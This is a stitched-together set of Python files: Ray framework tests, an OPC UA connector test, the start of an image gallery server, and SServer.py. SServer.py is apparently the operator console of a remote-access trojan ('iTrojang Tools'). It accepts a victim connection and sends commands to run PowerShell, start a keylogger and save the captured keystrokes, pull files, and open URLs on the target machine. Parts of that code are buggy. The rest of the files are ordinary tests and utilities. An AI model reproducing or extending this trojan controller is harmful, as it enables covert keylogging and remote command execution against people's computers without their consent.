    num_nodes = 3
    for _ in range(num_nodes):
        cluster.add_node(num_cpus=1)
    ray.init(address=cluster.address)

    @ray.remote
    def f(x):
        time.sleep(0.010)
        return ray.worker.global_worker.node.unique_id

    # This object will be local to one of the raylets. Make sure
    # this doesn't prevent tasks from being scheduled on other raylets.
    x = ray.put(np.zeros(1000000))

    attempt_to_load_balance(f, [x], 100, num_nodes, 25)
def wait_for_num_tasks(num_tasks, timeout=10):
    """Block until the task table reports at least ``num_tasks`` entries.

    Polls every 0.1 s and raises RayTestTimeoutException after ``timeout``
    seconds without success.
    """
    deadline = time.time() + timeout
    while time.time() < deadline:
        if len(ray.tasks()) >= num_tasks:
            return
        time.sleep(0.1)
    raise RayTestTimeoutException("Timed out while waiting for global state.")
def wait_for_num_objects(num_objects, timeout=10):
    """Block until the object table reports at least ``num_objects`` entries.

    Polls every 0.1 s and raises RayTestTimeoutException after ``timeout``
    seconds without success.
    """
    deadline = time.time() + timeout
    while time.time() < deadline:
        if len(ray.objects()) >= num_objects:
            return
        time.sleep(0.1)
    raise RayTestTimeoutException("Timed out while waiting for global state.")
@pytest.mark.skipif(
    os.environ.get("RAY_USE_NEW_GCS") == "on",
    reason="New GCS API doesn't have a Python API yet.")
def test_global_state_api(shutdown_only):
    """End-to-end check of the global state API (tasks/objects/nodes/jobs)."""
    error_message = ("The ray global state API cannot be used "
                     "before ray.init has been called.")

    # Every global-state accessor must fail before ray.init().
    with pytest.raises(Exception, match=error_message):
        ray.objects()

    with pytest.raises(Exception, match=error_message):
        ray.tasks()

    with pytest.raises(Exception, match=error_message):
        ray.nodes()

    with pytest.raises(Exception, match=error_message):
        ray.jobs()

    ray.init(num_cpus=5, num_gpus=3, resources={"CustomResource": 1})

    assert ray.cluster_resources()["CPU"] == 5
    assert ray.cluster_resources()["GPU"] == 3
    assert ray.cluster_resources()["CustomResource"] == 1

    assert ray.objects() == {}

    job_id = ray.utils.compute_job_id_from_driver(
        ray.WorkerID(ray.worker.global_worker.worker_id))
    driver_task_id = ray.worker.global_worker.current_task_id.hex()

    # One task is put in the task table which corresponds to this driver.
    wait_for_num_tasks(1)
    task_table = ray.tasks()
    assert len(task_table) == 1
    assert driver_task_id == list(task_table.keys())[0]
    task_spec = task_table[driver_task_id]["TaskSpec"]
    nil_unique_id_hex = ray.UniqueID.nil().hex()
    nil_actor_id_hex = ray.ActorID.nil().hex()

    # The driver's placeholder task has nil actor/function ids and no args.
    assert task_spec["TaskID"] == driver_task_id
    assert task_spec["ActorID"] == nil_actor_id_hex
    assert task_spec["Args"] == []
    assert task_spec["JobID"] == job_id.hex()
    assert task_spec["FunctionID"] == nil_unique_id_hex
    assert task_spec["ReturnObjectIDs"] == []

    client_table = ray.nodes()
    node_ip_address = ray.worker.global_worker.node_ip_address

    assert len(client_table) == 1
    assert client_table[0]["NodeManagerAddress"] == node_ip_address

    @ray.remote
    def f(*xs):
        return 1

    x_id = ray.put(1)
    result_id = f.remote(1, "hi", x_id)

    # Wait for one additional task to complete.
    wait_for_num_tasks(1 + 1)
    task_table = ray.tasks()
    assert len(task_table) == 1 + 1
    task_id_set = set(task_table.keys())
    task_id_set.remove(driver_task_id)
    task_id = list(task_id_set)[0]

    task_spec = task_table[task_id]["TaskSpec"]
    assert task_spec["ActorID"] == nil_actor_id_hex
    assert task_spec["Args"] == [1, "hi", x_id]
    assert task_spec["JobID"] == job_id.hex()
    assert task_spec["ReturnObjectIDs"] == [result_id]

    assert task_table[task_id] == ray.tasks(task_id)

    # Wait for two objects, one for the x_id and one for result_id.
    wait_for_num_objects(2)

    # NOTE(review): this helper is defined but never invoked — presumably it
    # was meant to run before the object table checks below; confirm.
    def wait_for_object_table():
        timeout = 10
        start_time = time.time()
        while time.time() - start_time < timeout:
            object_table = ray.objects()
            tables_ready = (object_table[x_id]["ManagerIDs"] is not None and
                            object_table[result_id]["ManagerIDs"] is not None)
            if tables_ready:
                return
            time.sleep(0.1)
        raise RayTestTimeoutException(
            "Timed out while waiting for object table to "
            "update.")

    object_table = ray.objects()
    assert len(object_table) == 2

    assert object_table[x_id] == ray.objects(x_id)
    object_table_entry = ray.objects(result_id)
    assert object_table[result_id] == object_table_entry

    job_table = ray.jobs()

    assert len(job_table) == 1
    assert job_table[0]["JobID"] == job_id.hex()
    assert job_table[0]["NodeManagerAddress"] == node_ip_address
# TODO(rkn): Pytest actually has tools for capturing stdout and stderr, so we
# should use those, but they seem to conflict with Ray's use of faulthandler.
class CaptureOutputAndError(object):
    """Capture stdout and stderr of some span.

    This can be used as follows.

        captured = {}
        with CaptureOutputAndError(captured):
            # Do stuff.
        # Access captured["out"] and captured["err"].
    """

    def __init__(self, captured_output_and_error):
        # Pick the in-memory buffer type that matches the interpreter
        # (cStringIO on Python 2, io.StringIO on Python 3).
        if sys.version_info >= (3, 0):
            import io
            buffer_factory = io.StringIO
        else:
            import cStringIO
            buffer_factory = cStringIO.StringIO
        self.output_buffer = buffer_factory()
        self.error_buffer = buffer_factory()
        self.captured_output_and_error = captured_output_and_error

    def __enter__(self):
        # Flush first so output buffered before the span is not captured.
        sys.stdout.flush()
        sys.stderr.flush()
        self.old_stdout, self.old_stderr = sys.stdout, sys.stderr
        sys.stdout = self.output_buffer
        sys.stderr = self.error_buffer

    def __exit__(self, exc_type, exc_value, traceback):
        # Flush so everything written inside the span lands in the buffers,
        # then restore the real streams and publish the captured text.
        sys.stdout.flush()
        sys.stderr.flush()
        sys.stdout, sys.stderr = self.old_stdout, self.old_stderr
        self.captured_output_and_error["out"] = self.output_buffer.getvalue()
        self.captured_output_and_error["err"] = self.error_buffer.getvalue()
def test_logging_to_driver(shutdown_only):
    """Worker stdout/stderr must be forwarded to the driver process."""
    ray.init(num_cpus=1, log_to_driver=True)

    @ray.remote
    def f():
        # It's important to make sure that these print statements occur even
        # without calling sys.stdout.flush() and sys.stderr.flush().
        for i in range(100):
            print(i)
            print(100 + i, file=sys.stderr)

    captured = {}
    with CaptureOutputAndError(captured):
        ray.get(f.remote())
        # Give the log monitor time to forward the worker's output.
        time.sleep(1)

    output_lines = captured["out"]
    for i in range(200):
        assert str(i) in output_lines

    # TODO(rkn): Check that no additional logs appear beyond what we expect
    # and that there are no duplicate logs. Once we address the issue
    # described in https://github.com/ray-project/ray/pull/5462, we should
    # also check that nothing is logged to stderr.
def test_not_logging_to_driver(shutdown_only):
    """With log_to_driver=False, worker output must not reach the driver."""
    ray.init(num_cpus=1, log_to_driver=False)

    @ray.remote
    def f():
        for i in range(100):
            print(i)
            print(100 + i, file=sys.stderr)
            sys.stdout.flush()
            sys.stderr.flush()

    captured = {}
    with CaptureOutputAndError(captured):
        ray.get(f.remote())
        # Give the log monitor a chance to (incorrectly) forward anything.
        time.sleep(1)

    output_lines = captured["out"]
    assert len(output_lines) == 0

    # TODO(rkn): Check that no additional logs appear beyond what we expect
    # and that there are no duplicate logs. Once we address the issue
    # described in https://github.com/ray-project/ray/pull/5462, we should
    # also check that nothing is logged to stderr.
@pytest.mark.skipif(
    os.environ.get("RAY_USE_NEW_GCS") == "on",
    reason="New GCS API doesn't have a Python API yet.")
def test_workers(shutdown_only):
    """Eventually num_cpus distinct workers should be observed running tasks."""
    num_workers = 3
    ray.init(num_cpus=num_workers)

    @ray.remote
    def f():
        return id(ray.worker.global_worker), os.getpid()

    # Wait until all of the workers have started.
    worker_ids = set()
    while len(worker_ids) != num_workers:
        worker_ids = set(ray.get([f.remote() for _ in range(10)]))
def test_specific_job_id():
    """A job_id passed to ray.init must be visible from driver and workers."""
    dummy_driver_id = ray.JobID.from_int(1)
    ray.init(num_cpus=1, job_id=dummy_driver_id)

    # in driver
    assert dummy_driver_id == ray._get_runtime_context().current_driver_id

    # in worker
    @ray.remote
    def f():
        return ray._get_runtime_context().current_driver_id

    assert dummy_driver_id == ray.get(f.remote())

    ray.shutdown()
def test_object_id_properties():
    """Validate ObjectID construction, pickling, and fork safety."""
    id_bytes = b"00112233445566778899"
    object_id = ray.ObjectID(id_bytes)
    assert object_id.binary() == id_bytes
    object_id = ray.ObjectID.nil()
    assert object_id.is_nil()
    # IDs must be exactly 20 bytes long.
    with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
        ray.ObjectID(id_bytes + b"1234")
    with pytest.raises(ValueError, match=r".*needs to have length 20.*"):
        ray.ObjectID(b"0123456789")
    object_id = ray.ObjectID.from_random()
    assert not object_id.is_nil()
    assert object_id.binary() != id_bytes
    id_dumps = pickle.dumps(object_id)
    id_from_dumps = pickle.loads(id_dumps)
    assert id_from_dumps == object_id
    file_prefix = "test_object_id_properties"

    # Make sure the ids are fork safe.
    def write(index):
        # BUG FIX: the original bound this to the name `str`, shadowing the
        # builtin.
        random_hex = ray.ObjectID.from_random().hex()
        with open("{}{}".format(file_prefix, index), "w") as fo:
            fo.write(random_hex)

    def read(index):
        with open("{}{}".format(file_prefix, index), "r") as fi:
            for line in fi:
                return line

    processes = [Process(target=write, args=(_, )) for _ in range(4)]
    for process in processes:
        process.start()
    for process in processes:
        process.join()
    hexes = {read(i) for i in range(4)}
    # Plain loop for the cleanup: a list comprehension used only for its
    # side effect is misleading.
    for i in range(4):
        os.remove("{}{}".format(file_prefix, i))
    # All four forked processes must have produced distinct random IDs.
    assert len(hexes) == 4
@pytest.fixture
def shutdown_only_with_initialization_check():
    """Shut down Ray after the test and assert the shutdown took effect."""
    yield None
    # The code after the yield will run as teardown code.
    ray.shutdown()
    assert not ray.is_initialized()
def test_initialized(shutdown_only_with_initialization_check):
    """ray.is_initialized() must flip to True after ray.init()."""
    assert not ray.is_initialized()
    ray.init(num_cpus=0)
    assert ray.is_initialized()
def test_initialized_local_mode(shutdown_only_with_initialization_check):
    """ray.is_initialized() must also work when running in local mode."""
    assert not ray.is_initialized()
    ray.init(num_cpus=0, local_mode=True)
    assert ray.is_initialized()
def test_wait_reconstruction(shutdown_only):
    """ray.wait must succeed on an object evicted from the object store."""
    ray.init(num_cpus=1, object_store_memory=int(10**8))

    @ray.remote
    def f():
        # A 60 MB result: two of them cannot both fit in the 100 MB store.
        return np.zeros(6 * 10**7, dtype=np.uint8)

    x_id = f.remote()
    ray.wait([x_id])
    # Creating a second large result evicts the first one.
    ray.wait([f.remote()])
    assert not ray.worker.global_worker.core_worker.object_exists(x_id)
    # Waiting on the evicted object must still report it as ready.
    ready_ids, _ = ray.wait([x_id])
    assert len(ready_ids) == 1
def test_ray_setproctitle(ray_start_2_cpus):
    """Workers must rename their process title to reflect the running task."""
    @ray.remote
    class UniqueName(object):
        def __init__(self):
            assert setproctitle.getproctitle() == "ray_UniqueName:__init__()"

        def f(self):
            assert setproctitle.getproctitle() == "ray_UniqueName:f()"

    @ray.remote
    def unique_1():
        assert setproctitle.getproctitle(
        ) == "ray_worker:ray.tests.test_basic.unique_1()"

    actor = UniqueName.remote()
    ray.get(actor.f.remote())
    ray.get(unique_1.remote())
def test_duplicate_error_messages(shutdown_only):
    """Appending the identical error message to the GCS twice must not fail."""
    ray.init(num_cpus=0)
    driver_id = ray.WorkerID.nil()
    error_data = ray.gcs_utils.construct_error_message(driver_id, "test",
                                                       "message", 0)

    # Push the same message to the GCS twice (they are the same because we
    # do not include a timestamp).

    r = ray.worker.global_worker.redis_client

    r.execute_command("RAY.TABLE_APPEND",
                      ray.gcs_utils.TablePrefix.Value("ERROR_INFO"),
                      ray.gcs_utils.TablePubsub.Value("ERROR_INFO_PUBSUB"),
                      driver_id.binary(), error_data)

    # Before https://github.com/ray-project/ray/pull/3316 this would
    # give an error
    r.execute_command("RAY.TABLE_APPEND",
                      ray.gcs_utils.TablePrefix.Value("ERROR_INFO"),
                      ray.gcs_utils.TablePubsub.Value("ERROR_INFO_PUBSUB"),
                      driver_id.binary(), error_data)
@pytest.mark.skipif(
    os.getenv("TRAVIS") is None,
    reason="This test should only be run on Travis.")
def test_ray_stack(ray_start_2_cpus):
    """`ray stack` output must mention the functions currently running."""
    def unique_name_1():
        time.sleep(1000)

    @ray.remote
    def unique_name_2():
        time.sleep(1000)

    @ray.remote
    def unique_name_3():
        unique_name_1()

    # Start two long-running tasks whose frames `ray stack` should show
    # (unique_name_1 appears as a nested frame inside unique_name_3).
    unique_name_2.remote()
    unique_name_3.remote()

    success = False
    start_time = time.time()
    while time.time() - start_time < 30:
        # Attempt to parse the "ray stack" call.
        output = ray.utils.decode(subprocess.check_output(["ray", "stack"]))
        if ("unique_name_1" in output and "unique_name_2" in output
                and "unique_name_3" in output):
            success = True
            break

    if not success:
        raise Exception("Failed to find necessary information with "
                        "'ray stack'")
def test_pandas_parquet_serialization():
    """Smoke-test writing parquet files (plain and lz4-compressed).

    Skipped automatically when pandas is not installed.
    """
    # Only test this if pandas is installed
    pytest.importorskip("pandas")

    import pandas as pd
    import pyarrow as pa
    import pyarrow.parquet as pq

    tempdir = tempfile.mkdtemp()
    try:
        filename = os.path.join(tempdir, "parquet-test")
        pd.DataFrame({"col1": [0, 1], "col2": [0, 1]}).to_parquet(filename)
        with open(os.path.join(tempdir, "parquet-compression"), "wb") as f:
            table = pa.Table.from_arrays([pa.array([1, 2, 3])], ["hello"])
            pq.write_table(table, f, compression="lz4")
    finally:
        # Clean up even if a write above raises; otherwise the temporary
        # directory leaks (the original only removed it on success).
        shutil.rmtree(tempdir)
def test_socket_dir_not_existing(shutdown_only):
    """ray.init must create the raylet socket directory when it is missing."""
    random_name = ray.ObjectID.from_random().hex()
    temp_raylet_socket_dir = "/tmp/ray/tests/{}".format(random_name)
    temp_raylet_socket_name = os.path.join(temp_raylet_socket_dir,
                                           "raylet_socket")
    ray.init(num_cpus=1, raylet_socket_name=temp_raylet_socket_name)
def test_raylet_is_robust_to_random_messages(ray_start_regular):
    """Send garbage bytes to the node manager and check it keeps serving."""
    node_manager_address = None
    node_manager_port = None
    for client in ray.nodes():
        if "NodeManagerAddress" in client:
            node_manager_address = client["NodeManagerAddress"]
            node_manager_port = client["NodeManagerPort"]
    assert node_manager_address
    assert node_manager_port

    # Try to bring down the node manager:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((node_manager_address, node_manager_port))
        s.send(1000 * b"asdf")
    finally:
        # BUG FIX: close the socket; the original leaked it.
        s.close()

    @ray.remote
    def f():
        return 1

    # The node manager must still schedule tasks after receiving garbage.
    assert ray.get(f.remote()) == 1
def test_non_ascii_comment(ray_start_regular):
    """A remote function whose source contains non-ASCII text must work.

    The Japanese comment inside ``f`` is the fixture for this test and must
    remain non-ASCII.
    """
    @ray.remote
    def f():
        # 日本語 Japanese comment
        return 1

    assert ray.get(f.remote()) == 1
@ray.remote
def echo(x):
    """Identity remote function (used by test_load_code_from_local)."""
    return x
@ray.remote
class WithConstructor(object):
    """Actor whose payload is supplied through the constructor."""

    def __init__(self, data):
        self.data = data

    def get_data(self):
        return self.data
@ray.remote
class WithoutConstructor(object):
    """Actor whose payload is supplied via a setter instead of __init__."""

    def set_data(self, data):
        self.data = data

    def get_data(self):
        return self.data
class BaseClass(object):
    """Plain (non-actor) base class; also wrapped by ray.remote in tests."""

    def __init__(self, data):
        self.data = data

    def get_data(self):
        return self.data
@ray.remote
class DerivedClass(BaseClass):
    """Actor derived from a plain base class."""

    def __init__(self, data):
        # Due to different behaviors of super in Python 2 and Python 3,
        # we use BaseClass directly here.
        BaseClass.__init__(self, data)
def test_load_code_from_local(shutdown_only):
    """Remote functions and actors must work with load_code_from_local=True."""
    ray.init(load_code_from_local=True, num_cpus=4)
    message = "foo"
    # Test normal function.
    assert ray.get(echo.remote(message)) == message
    # Test actor class with constructor.
    actor = WithConstructor.remote(1)
    assert ray.get(actor.get_data.remote()) == 1
    # Test actor class without constructor.
    actor = WithoutConstructor.remote()
    actor.set_data.remote(1)
    assert ray.get(actor.get_data.remote()) == 1
    # Test derived actor class.
    actor = DerivedClass.remote(1)
    assert ray.get(actor.get_data.remote()) == 1
    # Test using ray.remote decorator on raw classes.
    base_actor_class = ray.remote(num_cpus=1)(BaseClass)
    base_actor = base_actor_class.remote(message)
    assert ray.get(base_actor.get_data.remote()) == message
def test_shutdown_disconnect_global_state():
    """Global state accessors must raise once Ray has been shut down."""
    ray.init(num_cpus=0)
    ray.shutdown()

    with pytest.raises(Exception) as e:
        ray.objects()
    assert str(e.value).endswith("ray.init has been called.")
@pytest.mark.parametrize(
    "ray_start_object_store_memory", [150 * 1024 * 1024], indirect=True)
def test_put_pins_object(ray_start_object_store_memory):
    """An ObjectID returned by ray.put must pin the object against eviction."""
    x_id = ray.put("HI")
    x_copy = ray.ObjectID(x_id.binary())
    assert ray.get(x_copy) == "HI"

    # x cannot be evicted since x_id pins it
    for _ in range(10):
        ray.put(np.zeros(10 * 1024 * 1024))
    assert ray.get(x_id) == "HI"
    assert ray.get(x_copy) == "HI"

    # now it can be evicted since x_id pins it but x_copy does not
    del x_id
    for _ in range(10):
        ray.put(np.zeros(10 * 1024 * 1024))
    with pytest.raises(ray.exceptions.UnreconstructableError):
        ray.get(x_copy)

    # weakref put
    y_id = ray.put("HI", weakref=True)
    for _ in range(10):
        ray.put(np.zeros(10 * 1024 * 1024))
    with pytest.raises(ray.exceptions.UnreconstructableError):
        ray.get(y_id)

    @ray.remote
    def check_no_buffer_ref(x):
        # IDs deserialized inside a task must not carry a pinning buffer.
        assert x[0].get_buffer_ref() is None

    z_id = ray.put("HI")
    assert z_id.get_buffer_ref() is not None
    ray.get(check_no_buffer_ref.remote([z_id]))
@pytest.mark.parametrize(
    "ray_start_object_store_memory", [150 * 1024 * 1024], indirect=True)
def test_redis_lru_with_set(ray_start_object_store_memory):
    """Re-putting an object whose table entry was LRU-evicted must not crash."""
    x = np.zeros(8 * 10**7, dtype=np.uint8)
    x_id = ray.put(x, weakref=True)

    # Remove the object from the object table to simulate Redis LRU eviction.
    removed = False
    start_time = time.time()
    while time.time() < start_time + 10:
        if ray.state.state.redis_clients[0].delete(b"OBJECT" +
                                                   x_id.binary()) == 1:
            removed = True
            break
    assert removed

    # Now evict the object from the object store.
    ray.put(x)  # This should not crash.
def test_decorated_function(ray_start_regular):
    """__ray_invocation_decorator__ must be applied to remote invocations."""
    def function_invocation_decorator(f):
        def new_f(args, kwargs):
            # Reverse the arguments.
            # Calls f with reversed positional args and kwargs forced to
            # {"d": 5}, while passing the caller's kwargs through unchanged.
            return f(args[::-1], {"d": 5}), kwargs

        return new_f

    def f(a, b, c, d=None):
        return a, b, c, d

    f.__ray_invocation_decorator__ = function_invocation_decorator
    f = ray.remote(f)

    result_id, kwargs = f.remote(1, 2, 3, d=4)
    assert kwargs == {"d": 4}
    assert ray.get(result_id) == (3, 2, 1, 5)
def test_get_postprocess(ray_start_regular):
    """_post_get_hooks must be able to rewrite the values ray.get returns."""
    def get_postprocessor(object_ids, values):
        # Drop all non-positive values from the fetched results.
        return [value for value in values if value > 0]

    # NOTE(review): the hook is never removed; presumably the
    # ray_start_regular fixture tears the worker down afterwards — confirm.
    ray.worker.global_worker._post_get_hooks.append(get_postprocessor)

    assert ray.get(
        [ray.put(i) for i in [0, 1, 3, 5, -1, -3, 4]]) == [1, 3, 5, 4]
def test_export_after_shutdown(ray_start_regular):
    """Remote definitions must be reusable across ray.init/shutdown cycles."""
    # This test checks that we can use actor and remote function definitions
    # across multiple Ray sessions.
    @ray.remote
    def f():
        pass

    @ray.remote
    class Actor(object):
        def method(self):
            pass

    ray.get(f.remote())
    a = Actor.remote()
    ray.get(a.method.remote())

    ray.shutdown()

    # Start Ray and use the remote function and actor again.
    ray.init(num_cpus=1)
    ray.get(f.remote())
    a = Actor.remote()
    ray.get(a.method.remote())

    ray.shutdown()

    # Start Ray again and make sure that these definitions can be exported from
    # workers.
    ray.init(num_cpus=2)

    @ray.remote
    def export_definitions_from_worker(remote_function, actor_class):
        ray.get(remote_function.remote())
        actor_handle = actor_class.remote()
        ray.get(actor_handle.method.remote())

    ray.get(export_definitions_from_worker.remote(f, Actor))
def test_invalid_unicode_in_worker_log(shutdown_only):
    """The log monitor must survive invalid UTF-8 bytes in worker log files."""
    info = ray.init(num_cpus=1)
    logs_dir = os.path.join(info["session_dir"], "logs")

    # Wait till first worker log file is created.
    # NOTE(review): no timeout here — if a worker log never appears this
    # loops forever; confirm the surrounding test runner enforces a timeout.
    while True:
        log_file_paths = glob.glob("{}/worker*.out".format(logs_dir))
        if len(log_file_paths) == 0:
            time.sleep(0.2)
        else:
            break

    # Write bytes that are not valid UTF-8 (0xe5 starts a truncated
    # multi-byte sequence).
    with open(log_file_paths[0], "wb") as f:
        f.write(b"\xe5abc\nline2\nline3\n")
        f.write(b"\xe5abc\nline2\nline3\n")
        f.write(b"\xe5abc\nline2\nline3\n")
        f.flush()

    # Wait till the log monitor reads the file.
    time.sleep(1.0)

    # Make sure that nothing has died.
    assert ray.services.remaining_processes_alive()
@pytest.mark.skip(reason="This test is too expensive to run.")
def test_move_log_files_to_old(shutdown_only):
    """Worker log files must be moved to logs/old/ when workers are killed."""
    info = ray.init(num_cpus=1)
    logs_dir = os.path.join(info["session_dir"], "logs")

    @ray.remote
    class Actor(object):
        def f(self):
            print("function f finished")

    # First create a temporary actor.
    actors = [
        Actor.remote() for i in range(ray_constants.LOG_MONITOR_MAX_OPEN_FILES)
    ]
    ray.get([a.f.remote() for a in actors])

    # Make sure no log files are in the "old" directory before the actors
    # are killed.
    assert len(glob.glob("{}/old/worker*.out".format(logs_dir))) == 0

    # Now kill the actors so the files get moved to logs/old/.
    [a.__ray_terminate__.remote() for a in actors]

    # NOTE(review): like the kill above, this loop has no timeout; it relies
    # on the files eventually appearing.
    while True:
        log_file_paths = glob.glob("{}/old/worker*.out".format(logs_dir))
        if len(log_file_paths) > 0:
            with open(log_file_paths[0], "r") as f:
                assert "function f finished\n" in f.readlines()
            break

    # Make sure that nothing has died.
    assert ray.services.remaining_processes_alive()
|
test_opcua_connector.py | # Copyright 2021. ThingsBoard
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
from threading import Thread
from time import sleep, time
from math import sin
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
from tests.connectors.connector_tests_base import ConnectorTestBase, log
# The opcua package is an optional dependency: if it is missing, install it
# on the fly and retry the import so this test module can still load.
try:
    from opcua.ua import NodeId, NodeIdType
    from opcua import ua, uamethod, Server
except ImportError:
    log.error("OpcUa library - not found. Installing...")
    TBUtility.install_package("opcua")
    from opcua.ua import NodeId, NodeIdType
    from opcua import ua, uamethod, Server
class OpcUaConnectorGeneralTest(ConnectorTestBase):
    """Tests for the OPC UA connector against an embedded test OPC UA server."""

    def test_number_one(self):
        self._create_connector("connection_test.json")
        self.assertTrue(self.connector is not None)
        self.check_or_create_server()
        self.connector.open()

    def check_or_create_server(self):
        """Lazily create and start the embedded test server exactly once."""
        if not hasattr(self, "test_server"):
            self.test_server = Server()
            # The flag must exist (and be True) before the server thread
            # starts polling it. BUG FIX: it was never initialized, so the
            # thread would have crashed with AttributeError.
            self.server_running = True
            self.__server_thread = Thread(target=self.__server_run,
                                          name="Test OPC UA server",
                                          args=(self.test_server,),
                                          daemon=True)
            # BUG FIX: the thread was created but never started, so the
            # test server never actually came up.
            self.__server_thread.start()
        self.assertTrue(self.test_server is not None)

    def __server_run(self, test_server):
        """Configure and run the OPC UA test server until stop is requested."""
        self.test_server = test_server

        class SubHandler(object):
            def datachange_notification(self, node, val, data):
                print("Python: New data change event", node, val)

            def event_notification(self, event):
                print("Python: New event", event)

        @uamethod
        def multiply(parent, x, y):
            return x * y

        self.test_server.set_endpoint("opc.tcp://0.0.0.0:4840/freeopcua/server/")
        self.test_server.set_server_name("Test Server")
        self.test_server.set_security_policy([
            ua.SecurityPolicyType.NoSecurity,
            ua.SecurityPolicyType.Basic256Sha256_SignAndEncrypt,
            ua.SecurityPolicyType.Basic256Sha256_Sign])
        uri = "http://127.0.0.1"
        idx = self.test_server.register_namespace(uri)
        # Build a small device tree: serial number, a temperature/humidity
        # sensor, a battery level, and one callable method.
        device = self.test_server.nodes.objects.add_object(idx, "Device1")
        name = self.test_server.nodes.objects.add_variable(idx, "serialNumber", "TEST")
        name.set_writable()
        temperature_and_humidity = device.add_object(idx, "TemperatureAndHumiditySensor")
        temperature = temperature_and_humidity.add_variable(idx, "Temperature", 56.7)
        humidity = temperature_and_humidity.add_variable(idx, "Humidity", 68.7)
        battery = device.add_object(idx, "Battery")
        battery_level = battery.add_variable(idx, "batteryLevel", 24)
        device.add_method(idx, "multiply", multiply, [ua.VariantType.Int64, ua.VariantType.Int64], [ua.VariantType.Int64])
        self.test_server.start()
        try:
            while self.server_running:
                sleep(.1)
        finally:
            self.test_server.stop()

    def stop_test_server(self):
        """Signal the server thread to exit its polling loop."""
        self.server_running = False

    def tearDown(self):
        super().tearDown()
        self.stop_test_server()
|
SServer.py | import socket
import sys
import threading
import colorama
import termcolor
class Server:
def __init__(self,host,port):
self.host = host
self.port = port
def ServerStart(self):
colorama.init()
version = 1 #Every Three New Commands a new version will be made
print(termcolor.colored(f'[WELCOME]You Are Using iTrojang Tools V{version}','green'))
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind((self.host,self.port))
s.listen(8)
connection, address = s.accept()
print(termcolor.colored(f'[Connection]{connection} Has Joined','green'))
def Recvmsg():
message = connection.recv(4000).decode('utf-8')
print(message)
if message.startswith('k: '):
message.replace('k: ','')
with open('Keylog','wb') as f:
f.write(bytes(message,encoding='utf-8'))
def Download_File(file):
f = open(file,'wb')
chunk = s.recv(1024)
while chunk:
f.write(chunk)
try:
chunk = s.recv(1024)
except socket.timeout as e:
break
s.settimeout(None)
while True:
SendMsg = input(f'[iTrojangToolsV{version}]Run iTrojang Command[!help For Cmd List]>')
connection.send(bytes(SendMsg, encoding='utf-8'))
if SendMsg == '!help':
print('[Command]!Upload <File> | Uploads File To Target Machine[IN PROGRESS]\n'
'[Command]!Download <File> | Downloads File From Target Machine[IN PROGRESS]\n'
'[Command]!Shell <Command> | Run PowerShell on Target Machine\n'
'[Command]!Screenshot | Takes a ScreenShot on Target Machine[IN PROGRESS]\n'
'[Command]!Stopserver | Stops Server\n'
'[Command]!Keylogger | Starts KeyLogger on Target Machine\n'
'[Command]!Open <URL> | Opens a URL in Target Machine\n'
'[Command]!Rickroll | Opens Rickroll on Target Machine'
)
elif SendMsg == '!Stopserver':
sys.exit('[Closed]Server Closed Due To User Closing it')
elif SendMsg[:12] == '!Screenshot ':
file_namefor = SendMsg[12:]
Download_File(file=file_namefor)
elif SendMsg[:8] == '!upload ':
file_name = SendMsg[8:]
Download_File(file=file_name)
t = threading.Thread(target=Recvmsg)
t.start()
s = Server(host='localhost',port=58699)
s.ServerStart()
|
imageme.py | #!/usr/bin/python
"""
imageMe is a super simple image gallery server.
Run imageme.py from the top level of an image directory to generate gallery
index HTML and run a SimpleHTTPServer on the localhost.
Imported as a module, use imageme.serve_dir(your_path) to do the same for any
directory programmatically. When run as entry point, imageme.serve_dir('.') is
what's called.
"""
# Dependencies
import base64, io, os, re, sys, threading, SimpleHTTPServer, SocketServer
# Attempt to import PIL - if it doesn't exist we won't be able to make use of
# some performance enhancing goodness, but imageMe will still work fine
# Whether Pillow/PIL is available; enables server-side thumbnailing when True.
PIL_ENABLED = False
try:
    print('Attempting to import from PIL...')
    from PIL import Image
    PIL_ENABLED = True
    print('Success! Enjoy your supercharged imageMe.')
except ImportError:
    # PIL is optional: without it the gallery still works, just without
    # pre-scaled thumbnails, so we only warn instead of failing.
    print(
        'WARNING: \'PIL\' module not found, so you won\'t get all the ' +\
        'performance you could out of imageMe. Install Pillow (' +\
        'https://github.com/python-pillow/Pillow) to enable support.'
    )
# Constants / configuration
## Filename of the generated index files
INDEX_FILE_NAME = 'imageme.html'
## Regex for matching only image files (lowercase extensions).
## Raw string fixes the invalid '\.' escape sequence, which is a
## SyntaxWarning on modern Python 3; the pattern value is unchanged.
IMAGE_FILE_REGEX = r'^.+\.(png|jpg|jpeg|tif|tiff|gif|bmp)$'
## Images per row of the gallery tables
IMAGES_PER_ROW = 3
## Resampling mode to use when thumbnailing (None when PIL is unavailable)
RESAMPLE = None if not PIL_ENABLED else Image.NEAREST
## Width in pixels of thumbnails generated with PIL
THUMBNAIL_WIDTH = 800
## Base64 data for an image notifying user of an unsupported image type
